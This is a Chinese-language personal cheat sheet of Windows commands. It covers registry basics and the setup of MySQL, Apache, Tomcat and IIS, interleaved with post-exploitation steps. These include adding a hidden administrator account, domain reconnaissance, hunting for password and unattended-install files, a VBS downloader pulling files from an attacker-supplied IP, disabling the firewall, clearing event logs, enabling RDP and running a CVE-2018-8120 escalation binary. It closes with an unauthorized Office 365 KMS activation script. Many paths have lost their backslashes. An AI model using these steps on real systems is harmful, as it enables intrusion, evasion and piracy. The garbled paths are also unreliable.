Windows系统命令备份

注册表（Windows95以后Windows系统版本，windows server中regedit和regedit32合并为一个新的编辑器，名称仍然是regedit）        
HKEY_LOCAL_MACHINE    HKLM    本机的软硬件信息
HKEY_CLASS_ROOT    HKCR    (1) 将文件扩展名与相关程序关联(2) 存储COM的注册信息(本质上是对HKLM/SOFTWARE/CLASS的一个映射)
HKEY_USERS    HKUSER    所有用户的首选项。
HKEY_CURRENT_USER    HKCU    当前用户的配置（）:①桌面设置②环境变量③网路和打印机连接④其他定义用户操作环境的设置(本质上是对HKUSER中一个键的映射)
HKEY_CURRENT_CONFIG    HKCF    本机的详细硬件信息。另外两个键包含临时信息，这些信息常常会更改
HKEY_DYN_DATA        包含需要存储在注册表中的任何易失性数据
HKEY_PERFORMANCE_DATA        包含与运行应用程序的性能相关的信息
        
数据类型    含义    在regedit中的显示样式
REG_SZ    大致相当于字符创    文本
REG_DWORD    大致相当于unit    8 位十六进制
REG_BINARY    大致相当于字节数组、    十六进制
REG_MULTI    大致相当于多字符串值    含有多个文本值的字符串
                 
注册表编辑器        
regedit32    存在于windows NT 和windows 2000中，可查看regedit不能查看的安全信息（另外两个节点信息）    

jdk14安装 - https://blog.csdn.net/bestsongs/article/details/105800251 

查找文件

查找mysql.exe
for /r c: %i in (mysql.exe) do echo %i

cmd命令-账号/域相关

net user 查看所有用户    
whoami    当前用户：电脑名/用户名或域名/用户名    
query user    查询所有登录用户/运行中用户-断开用户    
net localgroup    查看所有用户组    
net user ls abcd1234 /add    添加用户    
net localgroup Administrators ls /add    添加用户到组    
net user admin1 admin1 /add & net localgroup administrators admin1 /add    添加用户并添加用户到组    
net user /domain    查看域用户    
net view & net group "domain computers" /domain    查看当前域计算机列表    
net view /domain    查看域个数    
net view \\dc    查看dc域内共享文件    
net group /domain    查看域组    
net group "domain admins" /domain    查看域管理员    
net group "domain controllers" /domain    查看域控制器    
net config workstation    当前登录域 - 计算机名 - 用户名    
net use \\域控(如pc.xx.com) password /user:xxx.comusername    登录域内主机，可访问资源    
net localgroup administrators && whoami    查看当前用户是否属于管理组    
whoami /all    查看用户信息、权限等    
net share    共享目录    
cmdkey /l    保存登录凭证    
echo %logonserver%    查看当前域    
set    环境变量    
dsquery server    查看AD DC/LDS    
dsquery user    查看域内所有用户    
dsquery computer    查看域内所有计算机名称    
dir /s *.exe    查看当前目录及子目录所有文件信息（文件个数、目录个数、文件大小、总文件个数、总文件大小）    
echo %PROCESSOR_ARCHITECTURE%     识别系统体系结构    
net user 用户名    查看用户详细信息    
route print    查看路由表信息    
netsh firewall show config    域 配置文件配置/配置文件的服务配置文件/配置文件的允许的程序配置/配置文件的端口配置/配置文件的ICMP配置/日志配置    

cmd命令-文件/文件夹相关

文件操作 
copy con ftp.bat    创建bat文件    
copy con commandExec.vbs    创建vbs文件    "执行系统命令：
C:Users	hel3l> copy con commandExec.vbs #创建VBS脚本文件
Call WScript.CreateObject(""Wscript.Shell"").Run(""cmd /K {command}"", 8, True) #VBS文件内容
C:Users	hel3l> commandExec.vbs #执行脚本文件"    
del 文件名    删除    
dir /a -r-d /s /b    检查文件可写    
where filename    查看文件是否存在    
for /r c:windows	emp %i in (.) do @echo %i    查看当前路径及子路径文件夹个数 

敏感文件查询 
dir /b/s password.txt    查看当前路径及子目录的password.txt文件    
dir /s/a-d/b d:*.php    查找所有D盘php文件    
dir /b/s config.*    
findstr /si password *.xml *.ini *.txt    
findstr /si login *.xml *.ini *.txt    
C:sysprep.inf    "无人值守安装文件：
这些文件通常包含base64模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现，文件通常的位置如下："    
C:sysprepsysprep.xml    
C:WindowsPantherUnattendUnattended.xml    
C:WindowsPantherUnattended.xml 

上传/下载 

Bitsadmin    
上传vbs脚本    " downloadfile.vbs

' Set your settings

strFileURL = ""http://{YOUR_IP}/{FILE_NAME.EXT}""

strHDLocation = ""c:\{FILE_NAME.EXT}""

' Fetch the file

Set objXMLHTTP = CreateObject(""MSXML2.XMLHTTP"")

objXMLHTTP.open ""GET"", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then

Set objADOStream = CreateObject(""ADODB.Stream"")

objADOStream.Open

objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0 'Set the stream position to the start

Set objFSO = Createobject(""Scripting.FileSystemObject"")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

运行：

C:Users	hel3l>cscript.exe downloadfile.vbs"    

cmd命令 -1

cmd /c dir 执行完dir命令后关闭命令窗口。 
cmd /k dir   执行完dir命令后不关闭命令窗口。 
cmd /c start dir 会打开一个新窗口后执行dir指令，原窗口会关闭    
cmd /k start dir 会打开一个新窗口后执行dir指令，原窗口不会关闭。    
arp命令    
-A    查看arp缓存信息（动态/静态连接到该台机器的机器IP和mac）    
-s    捆绑IP/解决局域网IP盗用    
ping命令    
ping baidu.com >> 2.txt    输出ping结果到txt文件    
/t    一直执行/手动中断    
ipconfig命令    
ipconfig    以太网适配器本地连接--连接特定DNS后缀/自动配置的IPV4/子网掩码/默认网关    
ipconfig/all    "Windows IP配置 --主机名/主DNS后缀/节点类型/IP路由已启用/WINS代理已启用/DNS后缀搜索列表
以太网适配器本地连接 -- 连接特定DNS后缀/描述/mac地址/DHCP启用状态/自动配置启用状态/自动配置IPV4地址/子网掩码/默认网关/TCPIP上的NetBIOS启用状态/获得租约时间/租约过期时间/DHCP服务器/DNS服务器"    
netstat命令    
netstat -s -p icmp    查看路由器和主机连接 /ICMP连接情况    

windows用户

system 
nt authority(内置的系统管理账户)    
administrator    
普通账户，某些功能的使用，软件的安装等会受限    
来宾账户，权限和普通账户权限相仿    
win7用户管理（查看用户/组/修改密码）    控制面板-》用户账户    

普通用户提权

点击我的电脑，进入计算机系统的管理界面。
怎样设置win7系统普通用户权限为管理员权限
在计算机管理界面，点击用户和用户组。
点击用户后，查看所有的用户。
在所有的用户里，选择一个用户。
选择好用户后，双击选定用户进入属性界面。
在用户的属性界面，选择隶属按钮。
在隶属界面，点击添加按钮并输入管理组名称。
输入完成管理名称，点击确定按钮。
然后我们返回计算机管理界面，点击用户组查看计算机管理员账户。
点击计算机管理员账户，发现刚才选定的用户已经加入管理员组获得管理员权限。
计算机管理组名称比管理员名称多一个S。

防火墙相关-1

查看端口信息 netstat -ano | findstr "8080" 
根据Pid查看进程名称    tasklist | findstr "5992"    
根据Pid结束进程    taskkill /pid 1164    
查看防火墙配置    netsh firewall show config    
添加防火墙规则（开放3389端口访问）    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

防火墙相关-2

netsh firewall show state    防火墙状态/开放端口查询    
netsh firewall set opmode mode=disable    关闭防火墙    
DriverQuery    查看安装驱动(模块名/显示名称/驱动程序类型/链接日期)    
wmic product list brief    查看安装程序及版本信息    
type 1.txt    打开文件/相当于Linux中cat    
wmic /output:D:/1.txt cpu get name    获取wmic执行结果如CPU信息写入txt文件    
wmic /output:D:/1.txt service list brief    查看服务信息（ExitCode/Name/ProcessId/StartMode/State/Status）    
wmic /output:2.txt process list brief    查看进程信息(HandleCount Name Priority ProcessId ThreadCount WorkingSetSize )    
wmic startup list brief    查看启动程序信息（Caption Command User ）    
C:Users	hel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn    查看补丁信息（Caption Description HotFixID InstalledOn ）    
C:Users	hel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"    查看单个补丁信息    
cls    清屏    
reg    注册表操作    

文件/文件夹相关

文件夹权限获取    文件夹属性-》安全-》高级—》所有者-》切换为想要的账号    
一、强制删除文件或目录CMD命令：    
rd/s/q 盘符:某个文件夹  （强制删除文件文件夹和文件夹内所有文件）    
del/f/s/q 盘符:文件名  （强制删除文件，文件名必须加文件后缀名）    
二、删除文件或目录BAT命令：    
1、新建.BAT批处理文件输入如下命令，然后将要删除的文件拖放到批处理文件图标上即可删除。    
DEL /F /A /Q     
RD /S /Q     
三、强制删除工具软件推荐：    
1、绿鹰文件解锁删除器FileSuperDelete    
2、PowerTool.exe    
3、Unlocker 1.8.7    

域相关

域管理工具：dsquery

连通性检测

icmp    ping(查网速)/tracert（查问题）    
DNS    nslookup（linux dig）    
http    curl    
tracert    

日志相关

分析工具  LogParser

wevtutil命令

wevtutil gli "windows powershell"  #获取单个日志类别的统计信息
wevtutil qe /f:text "windows powershell"  #查看指定日志的具体内
wevtutil cl "windows powershell"  #删除单个日志类别的所有信息

cmd命令

explorer    资源管理器    
logoff    注销    
tsshutdn    60倒计时关机    
lusrmgr.msc    本地用户和组    
oobe/msoobe /a    检测系统是否激活（XP）    
notepad    记事本    
cleanmgr    打开磁盘清理窗口    
net start/stop 服务名    开启/关闭服务    
dvdplay    DVD播放器    
charmap    字符映射表    
calc    计算器    
chkdsk.exe    磁盘碎片整理    
devmgmt.msc    设备管理器    
rononce -p    15s关机    
rsop.msc    组策略结果集    
winver    windows版本    
sfc /scannow    扫描错误并还原    
net config server /hidden:yes / net config server /hidden:no    在网络邻居中隐藏计算机/取消隐藏    
dxdiag    启动DirectX进行驱动检测    
regedit    打开注册表    
msconfig.exe    系统配置    
perfmon.msc    性能监视器    
taskmgr    任务管理器    
wmimgmt.msc    打开windows管理体系结构（WMI）    
write    写字板    
mspaint    画图    
magnify    放大镜    
mmc    控制台    
mobsync    同步中心    
dcomcnfg    组件服务    
narrator    讲述人    
shrpubw    创建共享文件夹    
secpol.msc    本地安全策略    
syskey    启动加密    
eventvwr    事件查看器    
eudcedit    字符编辑程序    
regsvr32 /u *.dll    停止dll文件运行    
regsvr32 /u zipfldr.dll    取消zip支持    
certmgr.msc    证书管理    
cliconfg    SQL Server客户端网络实用工具    
osk    屏幕键盘    
odbcad32    ODBC数据源管理器    
iexpress    系统自带木马捆绑工具    
utilman    辅助工具管理器    

系统错误处理

6118    关闭防火墙/启动computer brower服务    

服务相关

computer browser  -》搜索网上邻居    

安全认证相关

NTLM   CVE-2019-1040    
negotiate    

敏感文件相关

登录密码 C:windowssystem32configSAM    
修改/忘记登录密码 https://blog.51cto.com/pengge666/1892916    

mysql

远程连接    
mysql -h192.168.10.1 -uroot -proot    

ftp命令

远程连接    
ftp->open 10.1.1.1    
dir    
pwd    
bin    
put    
get    
mput *.txt    批量上传    
mget *    批量下载（所有文件）    
mget *.txt    批量下载    
mkdir    
rmdir    
delete    
mdelete *.txt    批量删除    
mdelete *    
bye

ftp命令2

open IP ftp连接
quit    退出
!dir    通过!执行shell命令如dir

navicat相关

卸载  -  控制面板/文件夹/注册表 

端口/PID/进程相关

关闭端口
netsh advfirewall firewall add rule name = "Disable port 135 - TCP" dir = in action = block protocol = TCP localport = 135
netsh advfirewall firewall add rule name = "Disable port 135 - UDP" dir = in action = block protocol = UDP localport = 135
端口被占用
80端口被PID4 - net stop http    sc config httpstart= disabled
端口相关工具  -  tcping / TCP&UDP测试工具

bat命令

echo on 表示在此语句后所有运行的命令都显示命令行本身 
echo off    表示在此语句后所有运行的命令都不显示命令行本身
@echo off   但它是加在每个命令行的最前面，表示运行时不显示这一行的命令行（只能影响当前行）。
call    调用另一个批处理文件（如果不用call而直接调用别的批处理文件，那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令）。
pause   暂停有提示
pause>nul   暂停无提示
rem 注释
title   BAT的标题
echo=   输出空格
color   字体颜色设置
mode con:cols=width lines=height    窗体大小（默认80 40）
tree /f 树形结构显示目录及子目录

 HackerBar破解

FF浏览器
安装2.1.3版本 https://github.com/Mr-xn/hackbar2.1.3
关闭插件自动更新

net

net user ------> 本机用户列表
net localgroup administrators ------> 本机管理员[通常含有域用户]
net user /domain ------> 查询域用户
net group /domain ------> 查询域里面的工作组
net group "domain admins" /domain ------> 查询域管理员用户组
net localgroup administrators /domain ------> 登录本机的域管理员
net localgroup administrators workgroupuser001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台)
net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表
net view /domain:domainname

dsquery

dsquery computer domainroot -limit 65535 && net group "domain
computers" /domain ------> 列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名
dsquery subnet ------>列出该域内网段划分
dsquery group && net group /domain ------>列出该域内分组 
dsquery ou ------>列出该域内组织单位 
dsquery server && net time /domain------>列出该域内域控制器

 IIS服务器搭建

Win7下启用IIS7配置ASP运行环境的详细方法    "
1、IIS7 在安装了上述组件后，如此操作：控制面板-系统和安全-管理工具-Internet信息服务（IIS）管理工具，打开运行。

                
Win7下启用IIS7配置ASP.NET运行环境的详细方法    "4、控制面板 --> 管理工具 -->Internet 信息服务(IIS)管理器 程序中找到 打开 Internet 信息服务(IIS)管理器 后，在中间部分的下部，可以看到 身份验证 配置项，双击

Mysql安装

net stop/start mysql                            
mysqld--initialize    初始化-需要清空data目录文件                        
sc delete mysql    服务删除                        
mysqld --install MySQL --defaults-file=“你配置文件的位置”    服务安装                        
mysqld --initialize-insecure --user=mysql （注意有空格）    data目录创建                        
没有my.ini文件                            
D:MySqlin>sc delete MySql（最好去电脑的服务窗口看下，如果找不到MySql服务，说明已经已经删除成功。如果还能看到MySql服务，可以手动右击选择”停止“）                            
新建一个my.ini空白文件(basedir 和 datadir 根据实际MySql安装的位置进行修改。)    "# For advice on how to change settings please see
# http://dev.mysql.com/doc/refman/5.6/en/server-configuration-defaults.html
# *** DO NOT EDIT THIS FILE. It's a template which will be copied to the
# *** default location during install, and will be replaced if you
# *** upgrade to a newer version of MySQL.
[client]
default-character-set = utf8mb4
[mysql]
default-character-set = utf8mb4
[mysqld]
character-set-client-handshake = FALSE
character-set-server = utf8mb4
collation-server = utf8mb4_bin
init_connect='SET NAMES utf8mb4'
# Remove leading # and set to the amount of RAM for the most important data
# cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%.
innodb_buffer_pool_size = 128M
# Remove leading # to turn on a very important data integrity option: logging
# changes to the binary log between backups.
# log_bin
# These are commonly set, remove the # and set as required.
basedir = D:MySQL
datadir = D:MySQLdata
port = 3306
# server_id = .....
# Remove leading # to set options mainly useful for reporting servers.
# The server defaults are faster for transactions and fast SELECTs.
# Adjust sizes as needed, experiment to find the optimal values.
join_buffer_size = 128M
sort_buffer_size = 16M
read_rnd_buffer_size = 16M 
sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES"                        
删除之前生成的data文件                            
D:MySqlin>mysqld --initialize-insecure --user=mysql    重新生成data文件                        
D:MySqlin>mysqld --install "MySql80" --defaults-file="d:/mysql/my.ini"    装MySql服务，同时设置绑定my.ini配置文件                        
net start mysql80    "cmd启动
如果不成功：可能是my.ini配置文件中的某些配置有问题。你可以修改ini文件内容，然后从头按步骤再试一遍。"                        
D:MySqlin>mysql -u root -p                            
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY '你的密码';                            
"如果需要自定义配置，可以打开文件进行相应的配置设置，修改后重启服务即可。
如果修改后，重启服务报错，可能是：你修改的配置与服务初始化时的配置有冲突，这时只能从头开始，在初始化的时候绑定my.ini文件 。"                            

Apache

问题：

httpd.exe -w -n "apache2.4" -k start  --分析问题原因


Windows 7 系统下安装 Apache 报 1053 错误 - "错误 1053: 服务没有及时响应启动或控制请求"
在 https://www.apachelounge.com/download/ 链接中找到 vc_redist_x64.exe 并下载

Windows不能在本地计算机启动Apache - 端口被占用

Tomcat安装

下载                            
http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.31/src/                            
选择zip  
                          
安装                            
安装前确保已经安装配置JDK。比如JAVA_HOME没配好是会一闪而过的。                            
解压                            
运行/bin/startup.bat                            
                            
卸载                            
删除文件夹                            
注册表搜索tomcat删除                            
删除tomcat服务 sc delete xxx         

FTP服务器搭建

计算机管理中创建ftp账号                            
Windows功能-》Internet信息服务-》FTP服务和FTP扩展勾选                            
ftp上传服务器    计算机管理-》服务和应用程序-》Internet信息服务-》网站-》右键选择添加ftp服务器                        
ftp下载服务器（上传下载使用不同端口）                            
根据端口访问上传和下载服务器                            
启动服务：Microsoft FTP Service     

关闭 - Windows

控制面板-》启动或关闭Windows功能-》找到FTP服务器-》取消勾选

0x01 netsh命令之防火墙
0X01-1 
Win2003
netsh firewall show state 查看系统防火墙状态
netsh firewall set opmode disable | netsh firewall get opmode disable 关闭防火墙
netsh firewall set opmode enable 开启防火墙
netsh firewall add portopening [tcp|udp|all] [Port] [name] 根据端口添加规则
netsh firewall delete portopening [tcp|udp|all] [Port] 根据端口删除规则
netsh firewall add allowedprogram [ProcessName] [name] enable 根据进程添加规则
netsh firewall delete allowedprogram [ProcessName] 根据进程删除规则

0X01-2
after Win2003
netsh firewall show config  查看防火墙配置
netsh advfirewall show allprofiles 查看防火墙状态
netsh advfirewall set allprofiles state off 关闭防火墙
netsh advfirewall set allprofiles state on 开启防火墙
netsh advfirewall reset 重置防火墙规则（重置刚装好系统时的状态）
netsh advfirewall firewall add rule name=[name] dir=in action=allow protocol=tcp localport=[Port] 根据端口添加入栈规则
netsh advfirewall firewall delete rule name=[name] dir=in protocol=tcp localport=[Port] 根据端口删除入栈规则
netsh advfirewall firewall add rule name=[name] dir=out action=allow protocol=tcp localport=[Port] 根据端口添加出栈规则
netsh advfirewall firewall delete rule name=[name] dir=out protocol=tcp localport=[Port] 根据端口删除出栈规则

0X02 netsh命令之流量转发
netsh interface portproxy show all 查看所有转发规则
netsh interface portproxy add v4tov4 listenport=[Port1] connectaddress=IP connectport=[Port2]
netsh interface portproxy delete v4tov4 listenport=Port 删除转发规则

netsh interface portproxy add v4tov4 listenaddress=172.17.17.116
 listenport=3306 connectaddress=47.75.16.28 connectport=7001  


Windows Server 2003 
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

Windows Serveer 2003 | Windows XP
[Method-1]
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
[Method-2]
REG ADD "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Windows Server 2008 | Windows10
reg query "hkey_local_machinesystemcurrentcontrolsetcontrol	erminal serverwinstationsRDP-Tcp"  /v  portnumber   查看远程连接端口


Win7
CVE-2018-8120.exe "REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

Windows Server 2008 | Win10 设置远程桌面端口
reg add “HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp” /t REG_DWORD /v portnumber /d [Port] /f



查询并开启远程连接端口
https://bugs.hacking8.com/tiquan/?m=open3389
Windows Server 2008 & 2012打开3389：
wmic /namespace:\rootcimv2	erminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

wmic /namespace:\rootcimv2	erminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1

reg add "HKLMSYSTEMCURRENTCONTROLSETCONTROLTERMINAL SERVER"  /v  fSingleSessionPerUser   /t  REG_DWORD  /d  0  /f

Windows Server 2003 开启3389
wmic path win32_terminalservicesetting where (__CLASS !="")   call  setallowtsconnections 1

Office365激活脚本（保存为.cmd后缀格式）

@echo off
title Activate Office 365 ProPlus for FREE - MSGuides.com&cls&echo ============================================================================&echo #Project: Activating Microsoft software products for FREE without software&echo ============================================================================&echo.&echo #Supported products: Office 365 ProPlus (x86-x64)&echo.&echo.&(if exist "%ProgramFiles%Microsoft OfficeOffice16ospp.vbs" cd /d "%ProgramFiles%Microsoft OfficeOffice16")&(if exist "%ProgramFiles(x86)%Microsoft OfficeOffice16ospp.vbs" cd /d "%ProgramFiles(x86)%Microsoft OfficeOffice16")&(for /f %%x in ('dir /b ..
ootLicenses16proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..
ootLicenses16\%%x" >nul)&(for /f %%x in ('dir /b ..
ootLicenses16proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..
ootLicenses16\%%x" >nul)&echo.&echo ============================================================================&echo Activating your Office...&cscript //nologo ospp.vbs /unpkey:WFG99 >nul&cscript //nologo ospp.vbs /unpkey:DRTFM >nul&cscript //nologo ospp.vbs /unpkey:BTDRB >nul&cscript //nologo ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99 >nul&set i=1
:server
if %i%==1 set KMS_Sev=kms7.MSGuides.com
if %i%==2 set KMS_Sev=kms8.MSGuides.com
if %i%==3 set KMS_Sev=kms9.MSGuides.com
if %i%==4 goto notsupported
cscript //nologo ospp.vbs /sethst:%KMS_Sev% >nul&echo ============================================================================&echo.&echo.
cscript //nologo ospp.vbs /act | find /i "successful" && (echo.&echo ============================================================================&echo.&echo #My official blog: MSGuides.com&echo.&echo #How it works: bit.ly/kms-server&echo.&echo #Please feel free to contact me at msguides.com@gmail.com if you have any questions or concerns.&echo.&echo #Please consider supporting this project: donate.msguides.com&echo #Your support is helping me keep my servers running everyday!&echo.&echo ============================================================================&choice /n /c YN /m "Would you like to visit my blog [Y,N]?" & if errorlevel 2 exit) || (echo The connection to my KMS server failed! Trying to connect to another one... & echo Please wait... & echo. & echo. & set /a i+=1 & goto server)
explorer "http://MSGuides.com"&goto halt
:notsupported
echo.&echo ============================================================================&echo Sorry! Your version is not supported.&echo Please try installing the latest version here: bit.ly/odt2k16
:halt
pause

interzjmcrm.zj.chinamobile.com